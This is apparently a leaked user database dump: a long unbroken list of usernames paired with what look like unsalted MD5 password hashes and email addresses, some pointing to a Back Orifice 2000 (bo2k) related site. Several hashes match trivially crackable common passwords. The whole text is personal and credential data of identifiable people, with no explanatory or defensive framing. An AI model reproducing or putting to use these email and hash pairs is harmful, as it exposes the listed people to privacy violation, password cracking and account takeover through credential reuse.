d06c66bcb84b28a0639d11e532967f61 will_collins_748@hotmail.com -RobCockula cad24b54e09ca1cc52b9b8ed6c62ee50 RobCockula26@yahoo.com -TonFTP 52b54adc660e48d7a62e5f902a4f52e8 TonFTP@gmail.com -gb_master fc5740e67573f3e0abad9288b2c3ae3e douglas.dexter@gmail.com -Todesengel_7 07ac20cabaf58239369e205db6d10937 tai_umfrage@gmx.de -JenBabe bbb8aae57c104cda40c93843ad5e6db8 jennifer_cbt@yahoo.com -jhaala 0c5f10813c5f6befe0da412e67a6aa60 fast_eclipse_mn@yahoo.com -alegioit 995506db4284929b734ebf0a41ad0b65 alegioit@hotmail.com -voodo_child2001 e27ec7742eab023761a11d4e7f6fc924 voodo_child2001@yahoo.com -mehrdad_rp 4f0cfe2f1e1d5aacd99c221bfffa897d mehlovebird@yahoo.com -devios 0d107d09f5bbe40cade3de5c71e9e9b7 devios_@hotmail.com -jabber 969068fa58a66493c682d41d7d0e9758 hn2subsw1@yahoo.co.uk -idhqidhq 98d0fd319c9a8896a10d902fe9f07944 idhq@hotmail.com -toddsyean a7d1468cea362edbeff943b22c8baea9 toddysean@gmail.com -GhostWriter ea06ed6e977637a81ea9d22b3090e28a boomracer@gmx.de -sabre_smyth@hotmail.com e03ef0423aa3f9f52bcfb9754d3e00aa sabre_smyth@hotmail.com -arlgil 92a189c4c0a2bd379b8c77fb4c869c01 arlgil@163.com -daveyr2005 97bf34d31a8710e6b1649fd33357f783 davidpaulrobinson@msn.com -Esper 6219bfd2585a9dadb469cb94ad6886a8 Esper@phrozencrew.net -tapabong 7f13da054bc4129ed0f9545903ea0346 jaycaponte@aol.com -eugenio_reis d2ebd77b92cfcbd673521778a27568c5 eugenio_reis@yahoo.com.br -rainmkr491 531cf6e04ba45b3c088cd4d4d3cc3c36 izntez1@excite.com -bosco123 5ebb368494f618c3d6634efa03eccf94 roger_crnkovic@hotmail.com -diazedu 8cd16f810259e92f6642f33a9c2939a4 diazedu2001@hotmail.com -jserras 80e6a9ed280e8720cdb622a43936dc08 jserras@gmail.com -datguywhowanders 565a959a4589e263fbc1d8fd06ccee60 datguywhowanders@hotmail.com -Castle e5fb9291472a271a8019b5eb99bc4ac4 Castle@hotmail.com -xtboss b878bc127cdb631d4fea3580fccceaa0 xtboss@gmail.com -diavoli f258c44abd31259af6f8be8c43e2209d toni_18_st@net.hr -foozel d8578edf8458ce06fbc5bb76a58c5ca4 KiyusRaven@aol.com -B.BOy 1581eac8d8b98d1404d0d67845b0fc86 lw0607_2c@yahoo.com.hk -BlueIce b5398a36d520ed87acd0df6290e25c90 sub7_1legends@yahoo.com -AcoLyte bfdb1c75e1b0d10406c2847fcf74fa9d kutjenoga@gmail.com -shintoroi c747739918027dc457ead76bbf2e2048 shintoroi@gmail.com -g00gle ddb756cb5b9d3c74d72f486d4e6adf7e google@timepassindia.com -lycan_sejemaset 265d8cea167a44fb0f7d409f11e8619e lycan.sejemaset@gmail.com -BAHRAM 9efac5beecff6fcdc067ae82b13ad15c royfe1991@hotmail.com -neat3 c33367701511b4f6020ec61ded352059 audi143@hotmail.com -frozen ff836d02cdc1195fe9208abb02ab46fa firebirdpts@yahoo.com -Silens.Intro ea0f3922b5c230d90183e0049811ac09 Silens.Intro@gmail.com -strumar 92e3edaf07cdee7cda6eaf4b4094ec35 strumar@warchilds.be -bluecollar 8c728e685ddde9f7fbbc452155e29639 blueco@hotmail.com -kitch 22d7fe8c185003c98f97e5d6ced420c7 kitch@tempinbox.com -blu3 a47ab8f2c6927dcb628b645d97640ccd rollin_blue_haze@yahoo.com -vangog c03350d5a1be90aeba31a444b0776e5c teb@inbox.ru -ceh 875ce7077e435d063b7f86b67897fd1f ceh.box@gmail.com -Smoked em 99d9de1a2a5f3d275e0492a42536ae04 tuff_luck_3290@yahoo.com -syrus 473b1a3d49ee043264dfc0ce89c93aca syruspirate@googlemail.com -FRoZen^IcECuBe 11e80a5f8f8a664c27ed8ea181c6df52 AnthonyMacP@gmail.com -grizox657 acc6f2779b808637d04c71e3d8360eeb grizox657@yahoo.com -ddahlinster b52b7e12d898e70cdc13d6335c2fa777 d_dahlin@hotmail.com -Abennobashi 6270edf1c1834aa721355b3d23d43f1d abennobashi@gmail.com -dark1111 11ddbaf3386aea1f2974eee984542152 ddarkkkk@abv.bg -endyss 266e9ba29954ddf397af924ac676792d allcreation@hotmail.com -wilfian 5bbc4042de0c404534fe15df52a516cb willaimelliker@hotmail.com -mithbuster d9d1b168eac8f197e0576b56cfc23ece mithbuster@makeevka.com -oxgon e10adc3949ba59abbe56e057f20f883e oxgon2000@yahoo.com -axa b04d69c159c0c530ff1185dd9c5e67a5 douglas.logue@gmail.com -jonny_holden 8f3d90da1ad6411d196cd2c2db930eaa jonny_holden@hotmail.com -blackcat b548041eace32fbc988c6540cdb8cb95 black.cat42@hotmail.com -r2al3ac 354523d6301186d4ccafc8523eb5f9fe r2al3ac@gmail.com -Joe245 7279964a65687f3a85fc7481bbe18f58 yeno@gmx.net -kryptophonik cea3cac2576136efbdd30e6524b012a3 kryptophonik@gmail.com -antonym55 c33367701511b4f6020ec61ded352059 antony_eml@yahoo.com.cn -imeanblue 9fdcd94521f7ef2350e539289c6bfa78 imeanblue@hotmail.com -.calibre decca33788173f1385c977d9bcf12e09 calibre@skynet.be -omzz aac8d3b36e06b6d9fbaf144010b16e95 omzzz@voila.fr -godamsmack 5f4dcc3b5aa765d61d8327deb882cf99 godamsmack@hotmail.com -Obmar 59931dbc55de73dc815ac4a0170e5443 clitkick@hotmail.com -Dakknight 2d800611a623d9c4b4cbb316488195b0 darkelf451@yahoo.it -DeaDeYe92 406bec88df0259a6ee9298eece856932 daniel_k007@web.de -Slicer dc513ea4fbdaa7a14786ffdebc4ef64e mark5555590@hotmail.com -prt 792a3ef04542367d8fb033e43d219685 pret3nder@mail.pt -unkier 3cecd3a474c0d443ae302d5dcee22332 thelonius@rambler.ru -jrcarr 2c20d7c4459226145f53dfb9378793ec jason@cbsystems.us -kamilp 43b88b6e47b0c616476c73e352203b2e kamilpod@gmail.com -Qosmio 7420c889f047a09cc3dc49279128de88 Christopher.coulombe@maine.edu -Terner 7032f667ba2b7b76e0a2d5f381ea29d4 rdterner@gmail.com -boondocks acc6f2779b808637d04c71e3d8360eeb boondocks78@gmail.com -pfcjoker 14664cb6d79814ceb2bd164eb735f926 levivm@qwest.net -fuzzyspice ecb27bf66c32a67151e16bf55bcace25 dlynch912@gmail.com -chutiya 5f4dcc3b5aa765d61d8327deb882cf99 amit.online@rediffmail.com -mobigdick 5572528463822a93f8291acf97d51122 2d@altern.org -swoooosh 46c80604b14e02a2cf52ab723f979d74 swoooosh@ganja.nl -pedroantonio f2c98691732b9228eb21cdd4dc0c2dd0 pedroantoniosanz@gmail.com -shcotty1 7b3140c6e6fbe7074a38275572166b46 shcotty1@verizon.net -ThePropagandist 9d2d73ae6dae78174e5c0560798181f8 dtimo10@yahoo.com -sfall 4a484004cef4efebf22b2f7ec9cdc439 ju-borre@uniandes.edu.co -FBranco 027d83bb7f1fc8937c6fcb03c211d29d fernandobranco@ig.com.br -stevenroach112 afa492e2603cd239f272185511eefeb8 steven.roach1@ntlworld.com -jhivago 6822d91203d47896ff356cb288789bfa emlists@jandpnet.com -LOSTNODE c70c5a6ea7f886a0c94007cbafc70ba3 lostnode@hotmail.com -spymoto c5df268aff5f8f1fba48f0178fa23031 spymoto2005@yahoo.com -anavrintobin 71e033182966223b0625e18e54073f0c anavrintobin@yahoo.co.uk -howardchlee 9594e3487c5fe5cf15db8f01fde85ccf howardchlee@yahoo.com.hk -sokar24 eccaf7b49425d3655a14b8abdae0de28 only4realgamers@hotmail.com -jotajota31 2c393811032c15d982b9d5883bcdfd80 johnothonotron@gmail.com -neonair 5f4dcc3b5aa765d61d8327deb882cf99 neonair@hotmail.com -WCK 9f97ad24a5346dc0b4bdebc2cd4d03a9 prowck@yahoo.de -alfrede53 51b1b253fe6561b1358d2526ce8ea4aa pand1977@justmail.de -gbay 7b15bae339579c16ae0d8cdfdc43710b gbay@email.it -rokhard111 0ca5fc480de60ec30a7820983afadf08 rokhardl11@yahoo.com -svg_007 35f06a7dca13866b248b8821a3ebb3ee herui123@sina.com -TwoBadMice e18dec003a9c47124ea6ac6fcc810d57 dazmclean@googlemail.com -nsfreestuff 532ab4d2bbcc461398d494905db10c95 ns.freestuff@gmail.com -BPS fe7060952ec8bda13ea4560f881c8bfd bps@hush.ai 0 -pwrtanker 1cd87f5976c0893cb50d0758f528963f pwrtanker@hotmail.com -Cyberjack2008 7fe523758f3a3b98c80b8ab5ae720c12 JavaWooky@web.de -Krelio ad8ac71ca0d008942ed8f08d9ccdd073 krelic666@hotmail.com -dearyme dc483e80a7a0bd9ef71d8cf973673924 scosha@yahoo.com -i2tb_hk 9c09f19d809e8e166b92905783778d40 i2tbee@gmail.com -Heike e09291601a41a2aba00e6c7b13f41d20 darknight456@googlemail.com -FlankerONE c63d53e03cfc687fef1f338e585aeffd flankerone@gmail.com -UltimateAimbot d2aefeac9dc661bc98eebd6cc12f0b82 iamcanadianeh91@hotmail.com -zero b4cc344d25a2efe540adbf2678e2304c zach0isgod@yahoo.com -cyberbugs 858915f1d2d425959fd4da867ba6b599 cyberbugs@gmail.com -ratboy 1c382d803494d3199530f9b1ef80cadd ronniebradley@hotmail.co.uk -alercheebee a0274589bc3b3f298ecc07a03c6cba82 alercheebee@gmail.com -fbrulz 6552ded36ffc0333425628d6bb44e2e3 therealjoker@gmail.com -mindtempest 1bbd886460827015e5d605ed44252251 mindtempest@gmail.com -anon 5dac1b5914537a1bcd5ac55b181e8512 rugrat_1984@yahoo.com -serowpagru d8578edf8458ce06fbc5bb76a58c5ca4 serow_pagru@hotmail.com -otakuspeedvibe 7ab6684faaf74beeccb73263c7030935 pfunk84@gmail.com -j_saer 03420d70cbc705bbdcd4d1b153594692 j_saer@terra.com.br -scrappy 2951b7cff8784139bd4eb9a1703bb341 scrappy@pookmaiI.com -tonyx d41da3aa061fafc1f387d9c23c02f81f westsajd@net.hr -eezee2k 66b90059137094aed775d1bd4898bb34 nephylim@hotmail.co.uk -caius 7516c3b35580b3490248629cff5e498c kucsiku@freemail.hu -Water 1b908e69c96485706095ed1b37bea00a howisyourcat@gmail.com -mexp 3aac08709ebef8f743e742bedcf53e05 cmexp@yahoo.com -tzeentch.gm b5cf1ee2f1aa86297ac212abdc516d64 tzeentch.gm@googlemail.com -Hundredfold ba82571738d2ae31f9877c350e31216a vulpesnoctus@gmail.com -EdLaurence cfe96f1d4361e2427e6d9594b5de1a81 EdLaurence86@yahoo.com -hoeni 242c3d4de7eb843333cb8653348637bd hoeni2006@yahoo.de -torchw00d eec6f087e8a8d25ec8bd6212ee84fb73 torchw00d@hotmail.co.uk -id107savant 97bf34d31a8710e6b1649fd33357f783 id107savant@yahoo.com -Glo456 b24bbbf00b2b4fc46ca9d32087feb573 mo15esds@ukr.net -du1978 204147943bfb185a476de40330f6c6e6 caseytaylors@hotmail.com -shelleygal 870c6d4c434e3694a292cc4c288d7716 shelleygal@hotmail.co.uk -whocares e7af287f7c896a07485ff47fed078512 hugh_jass_1950@yahoo.com -devouzter 5ffad90d2856dcdb5b3b4a77717bf85d dhio_sc@yahoo.com -xander123 dd4b21e9ef71e1291183a46b913ae6f2 adavid459@gmail.com -Kontor068 4c5ac585a9b1336fbc46c211c0e2cdb9 miltux2@hotmail.com -mdoyle b5717ac4721f5136eb01cb2b7da53a4f mdoyle@jebcat.com -defcon110010 fe7deacc5e1992ab4cee3ddaec11225d defcon110010@yahoo.ca -foxxa 4e97aac9ef535a6524726245c55f45c3 fossa@cantv.net -sillyb2 d6501e78f40fc46c72676abc36ce8d92 donald_swofford@yahoo.com -wardperry 405b0ceb6fe44c79a61e48374bb35fbc wardperry@gmail.com -likeafox 818abf6c39b9cbb5e6f481593dfd7076 blindwisdom@gmail.com -just10 46a885f88614e761c3fe58a3565f7591 jlmmarshallsr07@yahoo.com -m0sQu1t0 5453b2e29ee98d569605d795e1ee3fde jadkins@earthlink.net -bozworth 50861e7d3006ffb2d89925d0227a8853 bozworth@cox.net -Corban 976b58614690d65d345c75703fde98ec trucorban@gmail.com -JILL f8ed98bfad3261d454aaa8cf83a617d9 OPTIC@MTS.NET -DiS 34c5ddb331e4c57ac815c2fb1b798bcf powercell@yandex.ru -monkeys bed128365216c019988915ed3add75fb nospaminmybox@gmail.com -SanDiego 88155358680c31cf322e5051eb720ec1 ergut@yahoo.com -skunkbot 2dd9e56dad9e6fc41d7e574c6ce1709f mymoniter67415@hotmail.com -tototttt 0da50fb45def439d9a0c99589035acf4 tototttt@emailaccount.com -Kaoss22 cf5b1a0b538c363029d7b661177576ee jackratcher@yahoo.com -diukas ce967350e38d2e511c6bc9322fe3f205 dikasr@gmail.com -dB_spy 7a12a47984333222320df4510947fbdd dB_spy@hotmail.de -Linuxt cedc1eaae026f4787bfa7aa06a01f640 webmaster@s-o-s.ath.cx -bombasschicken 7b96965aeb663cd6b19e7f3b51eeda37 bombasschicken@gmail.com -EyeScreaMan 15d353e08d0d6b1f91ac062002f432e0 hujumuju@gmail.com -phloyd d7324e16e63c939cbcfe0da54ad580e5 phloyd@hushmail.com -cpharlok ee3f65f317390751e35a12e843b62bd1 mierdabasura@yahoo.com.ar -Terr1 6a564c718560a4a8e21e9ec9d2d5da2d Pawelek_12@hotmail.com -ApologetixFan f3cb79ce41e274462841ec28336c551f Darrell.Wright@hotpop.com -HHGKLGGG4562 688aafb07e41b6b6e5f4ecb445c22d19 TSSHUNDE@GMAIL.COM -beeboo d3e2569e7347a3d61dee67ca8602784a mrjoesantiago@gmail.com -sciphre d2677fcbb6e994b8d04bcd211e4345ef sciphre@gmail.com -Mazde 61525227bfd6dde4bdcc10507ea2aede M_oNeY19@hotmail.com -Sveta_K 25d55ad283aa400af464c76d713c07ad sveta_k@avtograd.ru -Tattfreak 1506aeeb8c3a699b1e3c87db03156428 Tattfreak@hotmail.com -alpy c3f7200e5dae7e3782819840887d3eb6 alpy@atw.hu -Luckman 7a15b5176b89661d1355cad0b9b8755e Luckmanbc@gmail.com -minhcat 6914ba39147a61d3780828eb5c1a4097 minhcat301@yahoo.com.vn -thangnc 1c63129ae9db9c60c3e8aa94d3e00495 thangnc3376@yahoo.com -mick eaf88fbb49c09fe4124f9e9115f11a10 mick@orion-networks.com -comtim eeec53952262d66237b1f12d5beaefd2 los-geht@web.de -icu f75d2861211135d199dd18e7546ab7f9 buntonsamuel@hotmail.com -czeco 563a179d71b61498c9f4dd48918eb44f czecobar@ofir.dk -dougor 2c9ef15a83fc194fe81c9894b63fd3ae d_o_u_g_o_r@yahoo.com -humi30 83d4fd3aae52e7433d879f122d131015 infinito6969@hotmail.com -smokieboards 7fdae9e7c260dc2823b94d6535bdaf52 joe@sk8mag.co.uk -rabbit 56998f0ef0b3e1863cbfca874b54d0ce bloodyraven6@yahoo.com -catkinson 3d5524b7a2c1dcd6f936cfe822b36fa1 catkinson@stillsecure.com -tazzx 2e847bd340865d06dcd11d2e82c846e2 benedict_hobart@msn.com -riffraff4201969 07ae59d94a6fe052419cedc98caef3f1 riffraff4201969@yahoo.com -kidrock 13bbf54a6850c393fb8d1b2b3bba997b i_anonymous_now@yahoo.com -Srini 6f666cf793be4ad0cea7c52cd7cd228f sr.sakhamuri@gmail.com -slidez e2a09bfac7621aa057f96002ae8c310b slide@disdainedapathy.com -dj_romeo 208385e67c8c81cf5bfd21487ee8c84d janus_l85@hotmail.com -Jshaw995 d93c432e316ba39ca4c535b4698ec8b8 jshaw995@gmail.com -Various b76659098f368ec4f9bee760ac94429d mail1533361@bupkiss.net -lovelyboy 670b14728ad9902aecba32e22fa4f6bd cr8party@gmail.com -Txzeenath 09df42c949c9d606bfcdba36c6b87cda Txzeenath@hotmail.com -Arian b60814c31e97599edd7fd4e72728d44d darkarian@gmail.com -tasche 1619f7dd9d9851d064bd1e1cc7501bdb Peter-Taschenbrecker@freenet.de -lord_lame 117c1353b29b736d4a6c21de9d68f4fb carbuncle@tinet.ie -ckp342 a89895ac349a3edc670223f5a06b5ced ckp342@hanmail.net -bob3695 0fda884586bf970a1abb06baead5d4f8 bob3695@gmail.com -DXKPaX 10c93bdf84d3edab3a4ddaf504828517 CKM_K_PaX@hotmail.com -kolla 82a8f10c5e9252347bb5bd3419448401 cosca1@virgilio.it -mxmad32 e780d2eb9e1e33f1f46cd85314f5ffcb gaza_rocks@blueyonder.co.uk -Itchy 93d65c39f1187c946135bd88de9ad81d bd.itchy@gmail.com -e_har 32fe11003993de2e823eee5aa6a292b2 e_har@excite.com -dmswif be992056553a28199203e8bbc85561d4 dmswif@cooltoad.com -spikeyredcactus 481b9e71e4a25c941ba7cbdbda4f5184 stevenmilward.mail@virgin.net -beyondzro a83ca53b5f30e7c37532cdac2aa7d7ff direrayne@bellsouth.net -drewmerc ab1ecb0306525dbe191a81933e1f2df3 merc.drew@gmail.com -Random d9d1b168eac8f197e0576b56cfc23ece ty-star@yandex.ru -jason27 737ffb4d2337f50c147d39f3700d2b73 jasonmurp20@aim.com -bluebocks b3f952d5d9adea6f63bee9d4c6fceeaa bluebocks@gmail.com -coldplazma 5434b208b16cd62441e48aa8250d8965 coldplazma@gmail.com -abcdefg bb7baf91a5fa4d5f13b89f390b597c1b chimpparty@hotmail.com -demiurg ab3377689ef51cc7cece4690efdc7582 bo2k@demiurg.com.ua -Qien007 0a7bfe5c18b52053902286bade1b2b1d sw.bo2k.20.seriousworm@spamgourmet.com -woundedninja 636ea3aed1ac6cfbbe1c2226d9f831be lostinhicktwn@yahoo.com -mcbuddy 8e1d9fb7048aed385d1e055e86ac7fdd ilovepoker@gmail.com -khiladi420 a3d415ebacc129b99482361b22ac901b aqib.ca@gmail.com -madmic 0f4ae6e356df21d735b68c4caf36a1eb info@teenbanging.com -kujo2050 37881c838af61a85cb2e2910346861c4 kujo2050@yahoo.com -weavermech 2b58af6dddbd072ed27ffc86725d7d3a weavermech@hotmail.com -Knarf 042b87ee0f077393dd0a623abcdac5f5 franktarvis@gmail.com -andy.dope 13b42fa68373d7d5761d37f0ee117a34 andy_dope@yahoo.com -wxwok 329621c2c6be6d3768bc982f433f56ed wxwok@163.com -purplerose1414 6e3beef36e53d84849b5623ef2f981d5 sh-fan@hotmail.com -Yasiu bbe90435e03ed91a6244bbdaf8295c36 yasiu6@wp.pl -grandaddy 28071a51a65309f346c4986c3b531c15 tandit@hotmail.co.uk -schiznak 4a6f29d5cd1ae3ac69ed182e32d7bad1 schiznak@gmail.com -roawan f808b29cef99f0f0f6da6d7518d0e409 ronan@ppczone.net -Mudkeipz 99976a7747583f3638cb85020ed24ac9 rconbot@hotmail.com -miyakecito 91c50a2ba35d0331352796ec33510e18 suho1004_7ucky@hotmail.com -aalturki 3ebc64241036203e22f8eb51da71229e aalturki@yahoo.com -spidermonkey360 b3f952d5d9adea6f63bee9d4c6fceeaa spidermonkey360@gmail.com -mosquitos a790183c2f3ebff33c764e1d274765ca jos_boenders@yahoo.com -JMS a982f4bc830ba91606ed2727bd5f6b71 jordm.s@gmail.com -waramer d8d6844b8c13d9b08afb6f9fd470b4c5 waramer@msn.com -TonY 3021d2a32bc9b897039aab8d741ac1cb ante.zizic5@st.t-com.hr -tthgt 458b1ec91eb5bf54d84db0b4ddd2b6e4 wiked_sk8er@hotmail.com -atria 426799ab2957935fce54566e64f451d6 crucis@gmail.com -p41n a45958517604f5cd90d6ee51ad9cfdb6 p41n@msn.com -Blackhawk33bl f378cf9d04b6dfaf76fa748030abaf68 black33bl@gmail.com -Ahha 37d5b06dd83a99343703a616e23af750 andrew.herbert@bigpond.com -ddemayer 5f4dcc3b5aa765d61d8327deb882cf99 ddemayer@yahoo.com -Hugundo d2378132ec234003ea54a5fbbf8b2d6e hugohutt@netscape.net -mysticglass 5edcb37f3e85b76e88438cf88d407b58 mysticglass@hotmail.com -Losing_grip 6b1b36cbb04b41490bfc0ab2bfa26f86 game_hackers55@yahoo.com -teufeld b8490d404a7adbf412a67e38d42db37a teufeldam@hotmail.com -j9ck cd46ab8281b8841198691125241505b1 j9ck@hotmail.com -archie6506 791d6877915e9d496073b251652e2b75 archie6506@yahoo.com -islander420x a8543a7e7bab91ff14023e44cbf476ec unknown0100@gmail.com -sangnom bdea8b731aee7de9d56bff9fdb202a78 static10@gmail.com -Quazar 43abea0a9c7984b04d1d73dd0536d29b acepilot_mail@hotmail.com -anarchy.wannabe 2a1a7484650e4846b160ae6ec7034a6e californiascholar@gmail.com -cr112701 a427b342a9a55e4acc09de54bc50b183 cr112701@yahoo.com -Nitewing 3b363da30adcd4f0f087bf14ec01852d nitewingnbg@web.de -bash_ful e531279ef1006324ce1e62683235b991 bash_ful@lycos.com -Azraellion 1c63129ae9db9c60c3e8aa94d3e00495 mongrelzeal@yahoo.com -rebornmx 10028e566eb692939334abbbaa447cdc eberthx@gmail.com -b3181981 cb40f69e37fd34db8bd85ad100edbffc pcmusicpack@yahoo.com -ezopezop c48df93b9cae24a8bb5d5190949118d5 ezopezop@gmail.com -BaZuK e5eae8c2ae855841706c0d18601e26b7 sestsanjuan@gmail.com -BenderPX 21794a9e8bb448881a24b1830fd310a4 BenderPX@gmx.de -tumbling 8417a031bdadfb493a827cfec74bba14 tumblingdickweed@yahoo.com -rp2615 919c8b643b7133116b02fc0d9bb7df3f rp2615@gmail.com -snapper69 e10adc3949ba59abbe56e057f20f883e robalv69@hotmail.com -sdf 24dde05168c24253ce9fec0fddd1e48d registering@hotmail.fr -professer b0f6c5f60c1b19257e89746c8e9e0291 sarangokhale7740@gmail.com -strutter 95056fb60a47dda5ad96555b330328ac strutter0_2@hotmail.com -Falken 7ff22e4f72670a56e673e3004d89ec79 imapervertedpenguin@Gmail.com -mccraig 73fb108558a4cd60de719b4bce09b5f7 thejesuschrist@gmail.com -Angels Elite d081b9bee055191468b8046d10679f62 angelselite@netti.fi -cookymonsta 5225fb1447edfac6f38e70b09cf8868f TurningPointTeam@hotmail.com -dcotton a5410ee37744c574ba5790034ea08f79 dcotton444@hotmail.com -greenbashar f08e6e1ba70dfd84c68ef951f4862278 greenbashar@yahoo.com -majolu 78c367b85a2a777c8473ec8cbbfd2cc3 jande011@gmail.com -ssi379 2d02f9a110c28956283f136acf98f0bb ssi379@gmail.com -Tereill 686291c5589a528953ead5a6d89330fb hazeuh@gmail.com -RaDiX 2d036d0b9400b8de7696680d32b11359 atom.lepton@gmail.com -Toks 5769bd5e9908b728bd1b615a24bd181d strandspaziergang@gmail.com -BruteForce e10adc3949ba59abbe56e057f20f883e nardong_bling.bling@yahoo.com -xcanibal e79aab8c3069579c0bf9270e61d9b85c luisjaviercr@yahoo.es -aaronhettiger 5da280826b6a6f173e77af6dcab7ecb1 aaronhettiger2006@charter.net -Petra bae382c188d0a07282e0a6535d5aa3ce petrafernandes_19@hotmail.com -razboinik 941a4f914a0b560854c53f0fb744b94b razboinik@gadast.net -karbaruptum 0f357ad34cfd8c5d4c3746d09d329856 stingerkiss@gmail.com -Caede 36e28ffbc38804f5622a6c7eb26a84ea caede.x@gmail.com -RAYNE 819b0643d6b89dc9b579fdfc9094f28e islandrock1o@hotmail.com -devastator 4297f44b13955235245b2497399d7a93 burtonboarding@gmail.com -Logger101 7d39f78adfdee15818adb8178231f755 ydoifoget@hotmail.com -Captain Flint 25f9e794323b453885f5181f1b624d0b ness@biz.by -thrin 4efb6c6a0234546c28a61c78dfc81bc7 t3hmurphinator@yahoo.com -mindchaoz dc0ab68e9cd60cc67b3ff46dd8d2c168 mindflower@home.nl -z3rga b99cc420eb25205168e83190bae48a12 mnk320@hotmail.com -kmanq 1ca35e48e4ff815260bd19f83d755398 nullvariable@gmail.com -thepict a8f71221c15104d0386de376a52ae427 johnnypict@btinternet.com -Firemonkey5 369389d19e24204b4927e30dd7c39efc tl9791@gmail.com -spike_b 6967db0a1328e95063c06a54c141ddee spike_b@azet.sk -oracle000 5f9901fc60b769b523d0dd8e79b3fe08 darknkill@yahoo.com -skylined ea63d6685ba5f1282a16e5de5d899881 vpsodha@yahoo.com -jwallace 8f5dabb83317aec2dd5291447c94e2cc jonathan.wallace+bo2k@gmail.com -killah667 598f39b01f57a89093af829c1c52d1dc asmandu@gmx.at -jniwan 3c653d7d775852fca48c9bc3745d6062 anasiam@yahoo.fr -trialbin 4281a553da11987b17bdf62eed840859 trial66bin@yahoo.de -PostApoc eb399ccc1e5a65529486f6515a644d67 ccvw.postapoc@gmail.com -bitch5 7239ea2b5dc943f61f3c0a0276c20974 bitch5@bugmenot.com -dmarsh1111 3f911896d982c37242a4928332193744 dmarshal@gmail.com -krzysiek c29d6e6ea4173fbe29ecaec413c7da30 c_slodyczka@hotmail.com -themadmole c25a68128b55eab863ac1bfcfbb4c80a themadmole@hotmail.com -Real 3fa37babb3401ae6f110a2da41f89dc9 fakeassn1gga@yahoo.com -Huitopy ff4abc855d3322c9efbeb63de101ee7d woxudinygaxywedo@tempomail.fr -synple 42d388f8b1db997faaf7dab487f11290 synple@temporaryinbox.com -CircaSurvive 3dda7c19d254b6850a197686d6f76a22 twiggy_r_666@msn.com -martinb 80434e78f4d67507924befa17fd9ed5a martinb@zonnet.nl -Sticky cbcf3d0a4a296c56eb3f62132c0bbdb1 whittensw@msn.com -babacaba b5b7a9aef994ff8752c775f7546ef429 cabasa_delux@hotmail.com -cp_remix 784c2734004b3c31fe26fd58dedd2409 Digitalcheffe@gmail.com -gogo 1406f37190e825427440bc020919218a gogo30000@gmail.com -mycropht d96e63adb2979aa52e4f4b2d57708648 mycropht6@yahoo.com -blue16 308a3820e4cccbe043cb5228de5e71e3 friedberg33@rediffmail.com -mbucket f2e76ec7c799a4c3f6e42cf389ff0bc2 mbucket@gmail.com -sk8more 714fdf8591e2eccee74c709c2b27df7d skate_board_mortal@yahoo.com -alucard b224f06c2dce34f4103d6cd160cc9a1f delirium.martin@gmail.com -bo2kbr 4b7aea5ac9e04f5a96d619068996ee2d maykelmartins@hotmail.com -Dengue 878f2a0a6fa5b102805497ec5f49dbc4 ottorongo@yahoo.com -heckler002 6ff33ee0147a893e5aed0ab340dcae45 heckler001@msn.com -entens ab876d0cae04365ef93d3dee532b189f entens@gmail.com -almost_me dcffd4f1f7ea4c0cc6dd03a00c4eabf9 dan.lewis3@ntlworld.com -tempuser12345 cc03e747a6afbbcbf8be7668acfebee5 kcn@kcn.no -bod 2b5e528bfbbbc222cfc75c3e42b4559b bogdanov.mail@gmail.com -nogrev 592e43ba247e5d8b342054a06594c231 christophappelt@googlemall.com -gclim 0ffe084ebe6f3352b0fb2b4a1bae6780 guancheng@hotmail.com -caruanas 563f4454fec0a9b5b82e92396d753a69 commandofif@hotmail.com -bl0thc ce57c32366f4515dee0d09bfb3074386 ssnumb@hotmail.com -sast e10fc9ac2ece4303c160da15b0c07c7a stsandro@gmx.de -TRIDENTANGEL de05930dd46a984ca32aad9feac718e8 tridentangel@hotmail.co.uk -se7ensinsvii 233075f6cd8ff1a30eb0f6d25e1c2ffc se7ensinsvii@yahoo.com -nobodyimportant 5f4dcc3b5aa765d61d8327deb882cf99 nobodyimportant@phreaker.net -spiker 1aabac2c765359c4465f7ed5a09c9d6f i_do_wat_i_waunt@hotmail.com -kinggms da3d40c8667237865d9e2214f1f9ad8a kinggms@naver.com -dotmark.cn 25d55ad283aa400af464c76d713c07ad dotmark.cn@gmail.com -dphase 0ab8116778e75f1f66088cbbbedf6a7c joshua.deere@gmail.com -linuxluke b29c8c63e0f8d078c42e7974f1ff5501 linux_luke@msn.com -nuttsack d7eba311421bbc9d3ada44709dd61534 jclifton@esentia.com -PapaTy efec4d740ecb0c6b7fff7aebc6b5c8d8 tyler.vandenbos@fpimgt.com -happyface aa23e804d491c0dbf16d354a7b16e095 druska@gmail.com -rickythanh 0b7d102f947291bc668f2556c00cb902 rickymartin5002@yahoo.com -tram a152e841783914146e4bcd4f39100686 tramlub@yahoo.com -Paul f3804b7480fd5dce324a3a4e0fd11729 wanted1596@hotmail.com -alex283 608d7a797bd12a4d34568c9c3b85eda7 geryk@svitonline.com -snop c2c58ef45eafe4e944b61ed004703c10 marius-prehn@gmx.de -HeartsThatHate 75dfa1c8b9f1b1d8e599f2ed98f1ecd0 mbox01@gmail.com -djj e325b16aa10bc2b065742595902073cb deanejj@gmail.com -kadnak 0a37139a05189faf43863f13cfe8f75b kadnak@hotmail.fr -mosquito e52b3d043958e94b3b75ecaf70105414 piero.provenza@virgilio.it -filuren 6d14047bb47ab3fe9c9119350a9181dd erikesnygg@hotmail.com -rocybird 950522176876587bf9c2bbfde6a11d9e moon2bird@gmail.com -jamilnaz f633d3c6d8fbecfe3399b260396ce192 jamilnaz@gmail.com -MaxBetz c5927e46af105b36e2a73acec96d84dd knownownu@arcor.de -schiebdenwal 72332fd12ca9826919f0fabb13935854 nvm78-rumano@yahoo.com.ar -dms2ect 6ffad0bd87575c8de9785389dd1e3a6b dms2ect@bolton.ac.uk -Raven16 549b0789494daf9b461fa17d6c8341ef slacker116@gmail.com -tapeman d8af8377c26ea88031c689219e7f2d74 jack.wongg@gmail.com -Bliss7 db2e35a4d892f98878eb5144752983cb nmiri_lk@yahoo.com -pipochka de0d5d1a2414a3e6db4c45695ea94144 pipochka@gmail.com -jebneh 5dac1b5914537a1bcd5ac55b181e8512 jebneh1234@yahoo.com -bigbags ae9ce675ac2db2d8a0ef8fb016180664 coldsmoke@stfunoob.com -tyler7o2 c651e9ee9a637691fb9f87d8a9f74ffa hbsr7ukgvwerzfc@aim.com -fumblemonkey c53c5f836849e849c1049fe058b34484 ascobie@msn.com -wang6j cc8ed40ca199359f7ddea866380118fd wang6j1@163.com -shal b7d73e37e8807ba5c403c57b05cc7cc1 